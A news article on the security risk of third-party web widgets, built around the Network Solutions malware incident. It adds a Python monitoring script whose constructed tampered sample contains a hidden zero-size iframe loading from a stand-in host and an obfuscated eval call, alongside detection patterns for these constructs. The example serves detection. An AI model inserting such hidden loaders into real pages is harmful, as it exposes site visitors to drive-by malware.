Careful With That Third-Party Web Widget
Smaller businesses are more likely to use third-party Web applications on their websites -- and they are less likely to scan such code
Small- and midsized businesses use a lot of third-party Web applications: It saves them money and allows them to embed expertise that they might not otherwise have. But it can also open up their business and their customers to attack.
The recent Network Solutions incident shows how this practice can go very wrong: Ten days ago, the Internet domain provider learned that a Web-services widget it had placed on at least 120,000 parked Web pages was infecting visitors with malware. The firm reportedly downloaded the widget, known as the Small Business Success Index, from the third-party online directory WidgetBox.
As more businesses continue to use third-party code in their websites and import content from other sites, the security of their visitors increasingly relies on others.
"Over the past five years, Web 2.0 has taken the world by storm," says Neil Daswani, chief technology officer of Web scanning firm Dasient. "As a website administrator, your security is actually dependent on a bunch of third parties, so you should make sure to monitor all your code and widgets."
Network Solutions is not the only Internet company to inadvertently host malicious code on its website. A year ago, The New York Times infected an unknown number of visitors with a rogue program after fraudsters posed as a legitimate advertiser and submitted a virus-laden ad to the news service. Other websites -- such as Snapple.com, BusinessWeek and Fox News -- have had to deal with similar problems, Daswani notes.
The impact on a business hosting rogue code on its website can be dramatic and long-term. If Google flags a site as malicious because it's hosting rogue code, traffic can drop by as much as 95 percent, Daswani says. "We have received feedback from customers that even when they resolve the issue and their site is un-blacklisted, there still is an impact on their traffic," he says.
Solving this issue is not easy. There is no standard or accepted way to certify that code is safe and secure, says Andy Chou, chief scientist for code scanning firm Coverity. "In other industries, there are certifications for certain quality measurements of the products," Chou says. "There are lots of ways in other industries to show the consumer what they are getting. In software, there is nothing like that -- the users have to test it themselves."
Companies should check programs for malicious software or Trojan horses on a regular basis, security experts say. Developers can run a static analyzer over source code to find security vulnerabilities, while run-time scanners and antivirus scanners can detect malicious activity in widgets and programs before they are posted to a website.
However, the sites should be checked frequently as well, says Wayne Huang, chief technology officer of site-scanning firm Armorize. "A combination is a good approach," Huang says. "Source-code scanning has its limitations, but so does honey-client-type Web scanning."
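The monitoring Daswani and Huang describe can be started with something much simpler than a commercial scanner: keep a vetted copy of every third-party widget you embed, re-fetch it on a schedule, and flag both any change from the baseline and any of the telltale constructs (hidden iframes, eval over decoded strings, script injection via document.write) that drive-by loaders tend to use. The following is an added example written for this article, not code from Network Solutions, Dasient, Armorize or WidgetBox. The widget source, the "tampered" version and the pattern list are all constructed here for illustration; in practice the fetched text would come from the widget URL and the baseline from your own storage.

```python
"""Baseline-and-heuristic check for an embedded third-party widget script.

Added example (not from the original article). The two widget bodies below
are constructed sample data; the suspicious-pattern list is a small starting
set, not a complete malware signature database.
"""
import hashlib
import json
import re

# Constructed sample: the widget as it looked when it was first vetted.
BASELINE_WIDGET = """(function () {
  var box = document.getElementById("sbsi-widget");
  if (!box) { return; }
  box.innerHTML = "<p>Small Business Success Index: loading...</p>";
})();
"""

# Constructed sample: a later fetch of the same widget URL, now carrying an
# injected zero-size iframe loader and an obfuscated eval payload.
TAMPERED_WIDGET = BASELINE_WIDGET + """
document.write('<iframe src="http://example.invalid/loader.html" width="0" height="0" style="display:none"></iframe>');
eval(unescape('%76%61%72%20%78%3d%31%3b'));
"""

# Heuristics for constructs that legitimate widget code rarely needs but
# drive-by download loaders commonly use. Names are used in the report.
SUSPICIOUS_PATTERNS = {
    "eval-on-decoded-string": re.compile(
        r"""eval\s*\(\s*(?:unescape|atob|String\.fromCharCode)"""),
    "hidden-iframe": re.compile(
        r"""<iframe[^>]*(?:width|height)\s*=\s*['"]?0""", re.IGNORECASE),
    "document-write-script": re.compile(
        r"""document\.write\s*\(\s*['"][^'"]*<(?:script|iframe)""", re.IGNORECASE),
}


def sha256_hex(text: str) -> str:
    """Content hash used to compare a fetched widget against its baseline."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def diff_against_baseline(baseline: str, fetched: str) -> dict:
    """Report whether the fetched widget differs from the vetted copy."""
    b, f = sha256_hex(baseline), sha256_hex(fetched)
    return {"changed": b != f, "baseline_sha256": b, "fetched_sha256": f}


def find_suspicious(source: str) -> list:
    """Return the names of every suspicious pattern present in the source."""
    return [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(source)]


def check_widget(name: str, baseline: str, fetched: str) -> dict:
    """Combine the two checks into one verdict.

    'ok'     - identical to the vetted copy, nothing suspicious
    'review' - content changed (widgets do get legitimate updates), but no
               suspicious construct found; a human should re-vet it
    'block'  - a suspicious construct is present; pull the widget now
    """
    result = {"widget": name}
    result.update(diff_against_baseline(baseline, fetched))
    result["findings"] = find_suspicious(fetched)
    if result["findings"]:
        result["verdict"] = "block"
    elif result["changed"]:
        result["verdict"] = "review"
    else:
        result["verdict"] = "ok"
    return result


if __name__ == "__main__":
    # In a real deployment the second argument is the freshly fetched script.
    for fetched in (BASELINE_WIDGET, TAMPERED_WIDGET):
        print(json.dumps(check_widget("sbsi", BASELINE_WIDGET, fetched), indent=2))
```

A hash mismatch alone is deliberately only a "review" verdict: widget vendors push updates, so a changed hash is a trigger to re-vet the code, not proof of compromise. Run the check from a host that is not your own Web server, since some malicious widgets serve clean code to the site that embeds them and the payload only to ordinary visitors; that is the gap honey-client scanning, which Huang mentions, is meant to close.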
Security experts don't expect more companies to regularly scan their sites until a larger number suffer from issues similar to Network Solutions.
"This is an area that people are only now waking up to," says Coverity’s Chou. "From our experience with software development organizations, all of them have substantial portions of their resources built by third parties ... Anywhere where software is used, it is put together from different sources."